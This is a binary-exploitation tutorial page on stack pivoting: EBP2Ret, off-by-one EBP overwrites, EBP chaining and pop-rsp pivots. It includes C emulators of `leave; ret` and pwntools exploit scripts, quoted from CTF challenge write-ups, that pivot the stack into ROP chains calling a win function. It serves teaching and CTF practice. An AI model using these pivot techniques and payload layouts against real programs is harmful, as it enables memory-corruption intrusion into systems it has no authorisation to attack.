# Stack Pivoting - EBP2Ret - EBP chaining
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
## Basic Information

This technique exploits the ability to manipulate the **Base Pointer (EBP)** to chain the execution of multiple functions through careful use of the EBP register and the **`leave; ret`** instruction sequence.

As a reminder, **`leave`** is equivalent to:

```asm
mov esp, ebp
pop ebp
```

and a normal function epilogue is `leave` followed by `ret` (which is `pop eip`). Since the **saved EBP is on the stack** right before the saved EIP, an overflow that reaches the saved EBP can control EBP even when it cannot reach EIP.

### EBP2Ret

This technique is particularly useful when you can **alter the saved EBP but have no direct way to change the EIP register**. It leverages the behaviour of functions when they finish executing.

If, during the execution of `fvuln`, you manage to inject a **fake EBP** into the stack that points to an area of memory you control, where the address of your shellcode is stored (plus 4 bytes to account for the `pop ebp`), you can indirectly control EIP. Note that `fvuln`'s own epilogue only loads the fake value into EBP and then returns normally to its caller; the pivot happens at the **next `leave; ret`** (the caller's epilogue, or a `leave; ret` gadget): `mov esp, ebp` moves ESP to the fake EBP, `pop ebp` consumes the first 4 bytes there and advances ESP by 4, and `ret` **pops the address the attacker stored right after them into EIP.**\
Notice how you need to know **2 addresses**: the one ESP is going to be moved to, and the one you write at that location (plus 4) for `ret` to jump to.

#### Exploit Construction

First you need to know an **address where you can write arbitrary data/addresses**. ESP will point here and **run the first `ret`**.

Then, you need to know the address used by `ret` that will **execute arbitrary code**. You could use:

* A valid [**ONE\_GADGET**](https://github.com/david942j/one\_gadget) address.
* The address of **`system()`** followed by **4 junk bytes** and the address of `"/bin/sh"` (x86 bits).
* The address of a **`jmp esp;`** gadget ([**ret2esp**](../rop-return-oriented-programing/ret2esp-ret2reg.md)) followed by the **shellcode** to execute.
* Some [**ROP**](../rop-return-oriented-programing/) chain.
Remember that before any of these addresses in the controlled part of memory there must be **`4` bytes** because of the **`pop`** part of the `leave` instruction. It's possible to abuse these 4 bytes to set a **second fake EBP** and keep controlling the execution.

#### Off-By-One Exploit

There's a specific variant of this technique known as the "Off-By-One Exploit". It's used when you can **only modify the least significant byte of the saved EBP**. In such a case, the memory location storing the address to jump to with **`ret`** must share the first three bytes with the original EBP, which allows a similar manipulation under more constrained conditions.\
Usually the byte is overwritten with 0x00 so the pivot lands as far down the stack as possible (at the 256-byte-aligned address at or below the original EBP), which maximises the chance of landing inside the attacker's buffer. It's also common to use a RET sled in the stack and put the real ROP chain at the end, so that wherever the new ESP lands inside the RET SLED the final ROP chain gets executed.

### **EBP Chaining**

Therefore, putting a controlled address in the saved `EBP` slot of the stack and the address of `leave; ret` in the saved `EIP` slot, it's possible to **move `ESP` to the controlled `EBP` address from the stack**.

Now **`ESP`** is controlled pointing to a desired address and the next instruction to execute is `RET`. To abuse this, it's possible to place in the controlled ESP location:

* **`&(next fake EBP)`** -> Loaded into EBP by the `pop ebp` of the `leave` instruction
* **`system()`** -> Called by `ret`
* **`&(leave;ret)`** -> Called when system ends, it will move ESP to the fake EBP and start again
* **`&("/bin/sh")`** -> Parameter for `system`

Basically this way it's possible to chain several fake EBPs to control the flow of the program.

This is like a [ret2lib](../rop-return-oriented-programing/ret2lib/), but more complex with no apparent benefit, although it could be interesting in some edge cases.
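The two mechanisms above (EBP2Ret and EBP chaining) are easy to get wrong by one `pop`, so here is an added example, not code from the original page or the linked challenges, that emulates the x86 `leave; ret` epilogue over a small fake 32-bit stack. It shows that `fvuln`'s own epilogue only loads the fake EBP and that the pivot happens at the caller's `leave; ret`, and it runs a three-frame EBP chain where every frame is `[next fake EBP][&system][&(leave;ret)][&"/bin/sh"]`. `MEM_BASE`, `SYSTEM_ADDR`, `LEAVE_RET` and `BINSH` are assumed values chosen for the demo, not addresses of any real binary, and `system()` is modelled only as "read the argument at `[esp+4]`, then return into `[esp]`".

```c
/* Added example (not from the original page): emulator of `leave; ret`
 * over a fake 32-bit stack, demonstrating EBP2Ret and EBP chaining.
 * All addresses below are assumptions constructed for the demo. */
#include <stdint.h>
#include <stdio.h>

#define MEM_BASE    0xbffff000u   /* assumed start of the fake stack */
#define MEM_WORDS   64            /* 256 bytes of fake stack */
#define SYSTEM_ADDR 0xf7e1c000u   /* assumed &system */
#define LEAVE_RET   0x080484a0u   /* assumed `leave; ret` gadget */
#define BINSH       0xf7f5a000u   /* assumed &"/bin/sh" */
#define STOP        0xdeadc0deu   /* sentinel meaning "chain finished" */

typedef struct { uint32_t mem[MEM_WORDS]; uint32_t esp, ebp, eip; } cpu_t;

/* Map an address to a dword slot of the fake stack; NULL if outside or unaligned */
static uint32_t *slot(cpu_t *c, uint32_t addr) {
    if (addr < MEM_BASE || addr >= MEM_BASE + MEM_WORDS * 4 || (addr & 3)) return NULL;
    return &c->mem[(addr - MEM_BASE) / 4];
}
static int put(cpu_t *c, uint32_t addr, uint32_t v) {
    uint32_t *p = slot(c, addr);
    if (!p) return -1;
    *p = v; return 0;
}
/* leave == mov esp, ebp ; pop ebp */
static int do_leave(cpu_t *c) {
    uint32_t *p;
    c->esp = c->ebp;
    if (!(p = slot(c, c->esp))) return -1;
    c->ebp = *p; c->esp += 4; return 0;
}
/* ret == pop eip */
static int do_ret(cpu_t *c) {
    uint32_t *p = slot(c, c->esp);
    if (!p) return -1;
    c->eip = *p; c->esp += 4; return 0;
}

/* EBP2Ret: fvuln's saved EBP was overwritten with fake_ebp, its return address
 * was not. fvuln's `leave; ret` only loads EBP; the pivot happens at the caller's
 * `leave; ret`. Returns the EIP the caller's `ret` loads, or 0 if fake_ebp does
 * not point into memory the attacker controls (here: the modelled stack). */
uint32_t ebp2ret(uint32_t fake_ebp, uint32_t target) {
    cpu_t c = {{0}, 0, 0, 0};
    uint32_t saved_ebp_addr = MEM_BASE + 0x80;       /* fvuln's saved EBP slot */
    if (put(&c, saved_ebp_addr, fake_ebp) ||        /* the overflow */
        put(&c, saved_ebp_addr + 4, 0x08048500u) || /* untouched return into caller */
        put(&c, fake_ebp, 0x41414141u) ||           /* 4 junk bytes eaten by pop ebp */
        put(&c, fake_ebp + 4, target))              /* what the caller's ret pops */
        return 0;
    c.ebp = saved_ebp_addr;
    if (do_leave(&c) || do_ret(&c)) return 0;       /* fvuln epilogue: ebp = fake_ebp */
    if (do_leave(&c) || do_ret(&c)) return 0;       /* caller epilogue: esp = fake_ebp */
    return c.eip;
}

/* One fake frame: [next fake EBP][&system][&(leave;ret)][&"/bin/sh"] */
static void put_frame(cpu_t *c, uint32_t at, uint32_t next, uint32_t arg) {
    put(c, at, next); put(c, at + 4, SYSTEM_ADDR);
    put(c, at + 8, LEAVE_RET); put(c, at + 12, arg);
}

/* Run the chain: ebp = first frame, eip = leave;ret (both came from the overflow).
 * system() is modelled as: read its argument at [esp+4], then return into [esp],
 * which is the leave;ret gadget that pivots to the next frame.
 * Returns the number of system() calls made, or -1 if the chain derails. */
static int run_chain(cpu_t *c, uint32_t first_frame, uint32_t *args, int max_args) {
    int n = 0, steps;
    c->ebp = first_frame; c->eip = LEAVE_RET;
    for (steps = 0; steps < 64; steps++) {
        if (c->eip == STOP) return n;
        if (c->eip == LEAVE_RET) {
            if (do_leave(c) || do_ret(c)) return -1;
        } else if (c->eip == SYSTEM_ADDR) {
            uint32_t *a = slot(c, c->esp + 4);
            if (!a || n >= max_args) return -1;
            args[n++] = *a;
            if (do_ret(c)) return -1;
        } else return -1;                             /* jumped somewhere unmodelled */
    }
    return -1;
}

static uint32_t demo_args[4];

/* Three linked frames, then a terminator frame whose ret hits STOP */
int ebp_chain_demo(void) {
    cpu_t c = {{0}, 0, 0, 0};
    uint32_t f1 = MEM_BASE + 0x10, f2 = MEM_BASE + 0x40, f3 = MEM_BASE + 0x70;
    uint32_t end = MEM_BASE + 0xa0;
    put_frame(&c, f1, f2, BINSH);
    put_frame(&c, f2, f3, BINSH + 8);
    put_frame(&c, f3, end, BINSH + 16);
    put(&c, end, 0); put(&c, end + 4, STOP);
    return run_chain(&c, f1, demo_args, 4);
}
/* i-th argument system() received in the demo chain (0 if there was none) */
uint32_t ebp_chain_demo_arg(int i) {
    int n = ebp_chain_demo();
    return (i >= 0 && i < n) ? demo_args[i] : 0;
}

int main(void) {
    printf("EBP2Ret: caller's ret loads EIP=%#x\n", ebp2ret(MEM_BASE + 0x20, 0x08049abcu));
    printf("EBP chaining: %d system() calls, first arg %#x\n", ebp_chain_demo(), ebp_chain_demo_arg(0));
    return 0;
}
```

The emulator refuses to dereference anything outside the modelled stack, which is the same check you want in a real exploit: the fake EBP must point into memory you fully control, and the first dword there is lost to `pop ebp`, so the chain (or the second fake EBP) starts 4 bytes in.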
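The off-by-one variant above depends on where the 256-byte-aligned pivot address lands relative to the buffer, which changes with the stack's low byte. This added example (not from the original page) emulates that on a fake 32-bit stack: the saved EBP's low byte is zeroed, the buffer is filled with a `ret` sled ending in the real chain, and the function reports which EIP is finally loaded for a given stack offset. The frame layout (256-byte buffer directly below the saved EBP, caller's EBP 0x30 bytes above it) and every address are assumptions constructed for the demo.

```c
/* Added example (not from the original page): off-by-one EBP overwrite plus
 * ret sled, emulated on a fake 32-bit stack. Addresses and layout are assumed. */
#include <stdint.h>
#include <stdio.h>

#define MEM_BASE     0xbffff000u   /* assumed base of the fake stack */
#define MEM_WORDS    256           /* 1 KiB of fake stack */
#define BUF_BYTES    256           /* size of the overflowable buffer */
#define CALLER_FRAME 0x30u         /* assumed distance from saved EBP to caller's EBP */
#define RET_GADGET   0x0804900au   /* assumed address of a lone `ret` */
#define FIRST_GADGET 0x08049100u   /* assumed first gadget of the real ROP chain */
#define ORIG_RET     0x08048600u   /* fvuln's return address, which we cannot touch */
#define JUNK         0x43434343u   /* uncontrolled stack contents */

static uint32_t mem[MEM_WORDS];

static uint32_t rd(uint32_t addr) {     /* reads outside the model return JUNK */
    if (addr < MEM_BASE || addr >= MEM_BASE + MEM_WORDS * 4) return JUNK;
    return mem[(addr - MEM_BASE) / 4];
}
static void wr(uint32_t addr, uint32_t v) {
    if (addr >= MEM_BASE && addr < MEM_BASE + MEM_WORDS * 4) mem[(addr - MEM_BASE) / 4] = v;
}

/* Simulate the exploit for one ASLR outcome. `shift` (4-aligned, < 0x100) is the
 * unknown offset of the buffer inside its 256-byte window, i.e. the low byte the
 * attacker cannot know. Returns the EIP loaded after the caller's `leave; ret`
 * and the ret sled. */
uint32_t off_by_one_pivot(uint32_t shift) {
    uint32_t buf = MEM_BASE + 0x100 + shift;     /* attacker-controlled buffer */
    uint32_t saved_ebp_addr = buf + BUF_BYTES;    /* fvuln's saved EBP slot */
    uint32_t caller_ebp = saved_ebp_addr + CALLER_FRAME;
    uint32_t a, esp, eip;

    for (a = MEM_BASE; a < MEM_BASE + MEM_WORDS * 4; a += 4) wr(a, JUNK);
    for (a = buf; a < buf + BUF_BYTES - 4; a += 4) wr(a, RET_GADGET);  /* ret sled */
    wr(buf + BUF_BYTES - 4, FIRST_GADGET);        /* real chain starts in the last word */
    wr(saved_ebp_addr, caller_ebp & ~0xffu);      /* off-by-one: low byte becomes 0x00 */
    wr(saved_ebp_addr + 4, ORIG_RET);             /* EIP is out of reach */

    /* fvuln epilogue: leave loads the clobbered EBP, ret goes back into the caller.
     * Caller epilogue: leave == mov esp, ebp ; pop ebp  (the popped ebp no longer matters) */
    esp = rd(saved_ebp_addr);
    esp += 4;                                     /* pop ebp eats the word at the pivot */
    eip = rd(esp); esp += 4;                      /* ret */
    while (eip == RET_GADGET) { eip = rd(esp); esp += 4; }   /* slide down the sled */
    return eip;
}

/* How many of the 64 possible 4-aligned low bytes reach the chain? */
int working_shifts(void) {
    int n = 0;
    uint32_t s;
    for (s = 0; s < 0x100; s += 4) if (off_by_one_pivot(s) == FIRST_GADGET) n++;
    return n;
}

int main(void) {
    printf("shift 0x40: EIP=%#x (chain starts at %#x)\n", off_by_one_pivot(0x40), FIRST_GADGET);
    printf("shift 0x00: EIP=%#x (pivot hit the saved EBP slot itself)\n", off_by_one_pivot(0));
    printf("shift 0xf0: EIP=%#x (pivot landed in the caller's frame)\n", off_by_one_pivot(0xf0));
    printf("%d/64 low bytes land inside the sled\n", working_shifts());
    return 0;
}
```

With this layout 50 of the 64 offsets reach the chain; the failures are the cases where the zeroed address lands exactly on the saved EBP slot (or the chain's own last word) or above the saved EBP, in the caller's frame. The sled only helps when the pivot lands inside the buffer, so a bigger buffer or a caller with a larger frame improves the odds; a sled does not rescue a pivot that lands outside what you control.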
Moreover, here is an [**example of a challenge**](https://ir0nstone.gitbook.io/notes/types/stack/stack-pivoting/exploitation/leave) that uses this technique with a **stack leak** to call a win function. This is the final payload from the page:

```python
from pwn import *

elf = context.binary = ELF('./vuln')
p = process()

p.recvuntil(b'to: ')
buffer = int(p.recvline(), 16)   # leaked address of the user's buffer on the stack
log.success(f'Buffer: {hex(buffer)}')

LEAVE_RET = 0x40117c
POP_RDI = 0x40122b
POP_RSI_R15 = 0x401229

# ROP chain written at the start of the buffer; RSP will be moved here
payload = flat(
    0x0,               # rbp (could be the address of another fake RBP)
    POP_RDI,
    0xdeadbeef,
    POP_RSI_R15,
    0xdeadc0de,
    0x0,
    elf.sym['winner']
)

payload = payload.ljust(96, b'A')   # pad to 96 (just get to RBP)
payload += flat(
    buffer,      # Load the leaked address in RBP
    LEAVE_RET    # Use leave to move RSP to the user ROP chain and ret to execute it
)

pause()
p.sendline(payload)
print(p.recvline())
```

## EBP might not be used

As [**explained in this post**](https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/NOTES.md#off-by-one-1), if a binary is compiled with some optimizations, **EBP never controls ESP**, therefore any exploit working by controlling EBP will basically fail because it doesn't have any real effect.\
This is because the **prologue and epilogue change** if the binary is optimized.

* **Not optimized:**

```asm
push   %ebp         # save ebp
mov    %esp,%ebp    # set new ebp
sub    $0x100,%esp  # increase stack size
.
.
.
leave               # restore ebp (leave == mov %ebp, %esp; pop %ebp)
ret                 # return
```

* **Optimized:**

```asm
push   %ebx         # save ebx
sub    $0x100,%esp  # increase stack size
.
.
.
add    $0x10c,%esp  # reduce stack size
pop    %ebx         # restore ebx
ret                 # return
```

## Other ways to control RSP

### **`pop rsp` gadget**

[In this page](https://ir0nstone.gitbook.io/notes/types/stack/stack-pivoting/exploitation/pop-rsp) you can find an example using this technique.
For that challenge it was needed to call a function with 2 specific arguments, and there was a **`pop rsp` gadget** and there is a **leak from the stack**:

```python
# Code from https://ir0nstone.gitbook.io/notes/types/stack/stack-pivoting/exploitation/pop-rsp
# This version has added comments
from pwn import *

elf = context.binary = ELF('./vuln')
p = process()

p.recvuntil(b'to: ')
buffer = int(p.recvline(), 16)   # Leak from the stack indicating where the user's input is
log.success(f'Buffer: {hex(buffer)}')

POP_CHAIN = 0x401225     # pop all of: RSP, R13, R14, R15, ret
POP_RDI = 0x40122b
POP_RSI_R15 = 0x401229   # pop RSI and R15

# The payload starts
payload = flat(
    0,              # r13
    0,              # r14
    0,              # r15
    POP_RDI,
    0xdeadbeef,
    POP_RSI_R15,
    0xdeadc0de,
    0x0,            # r15
    elf.sym['winner']
)

payload = payload.ljust(104, b'A')   # pad to 104

# Start popping RSP, this moves the stack to the leaked address and
# continues the ROP chain in the prepared payload
payload += flat(
    POP_CHAIN,
    buffer          # rsp
)

pause()
p.sendline(payload)
print(p.recvline())
```

### xchg \<reg>, rsp gadget

```asm
pop <reg>        <=== return pointer
xchg <reg>, rsp
```

### jmp esp

Check the ret2esp technique here:

{% content-ref url="../rop-return-oriented-programing/ret2esp-ret2reg.md" %}
[ret2esp-ret2reg.md](../rop-return-oriented-programing/ret2esp-ret2reg.md)
{% endcontent-ref %}

## References & Other Examples

* [https://bananamafia.dev/post/binary-rop-stackpivot/](https://bananamafia.dev/post/binary-rop-stackpivot/)
* [https://ir0nstone.gitbook.io/notes/types/stack/stack-pivoting](https://ir0nstone.gitbook.io/notes/types/stack/stack-pivoting)
* [https://guyinatuxedo.github.io/17-stack\_pivot/dcquals19\_speedrun4/index.html](https://guyinatuxedo.github.io/17-stack\_pivot/dcquals19\_speedrun4/index.html)
  * 64 bits, off by one exploitation with a rop chain starting with a ret sled
* [https://guyinatuxedo.github.io/17-stack\_pivot/insomnihack18\_onewrite/index.html](https://guyinatuxedo.github.io/17-stack\_pivot/insomnihack18\_onewrite/index.html)
  * 64 bit, no relro, canary, nx and pie. The program grants a leak for stack or pie and a WWW of a qword. First get the stack leak and use the WWW to go back and get the pie leak. Then use the WWW to create an eternal loop abusing `.fini_array` entries + calling `__libc_csu_fini` ([more info here](../arbitrary-write-2-exec/www2exec-.dtors-and-.fini\_array.md)). Abusing this "eternal" write, a ROP chain is written in the .bss and it ends up being called pivoting with RBP.

## ARM64

In ARM64, the **prologue and epilogue** of functions **don't store and retrieve the SP register** on the stack. Therefore, by default, **you won't be able to control the SP register** by overwriting some data inside the stack.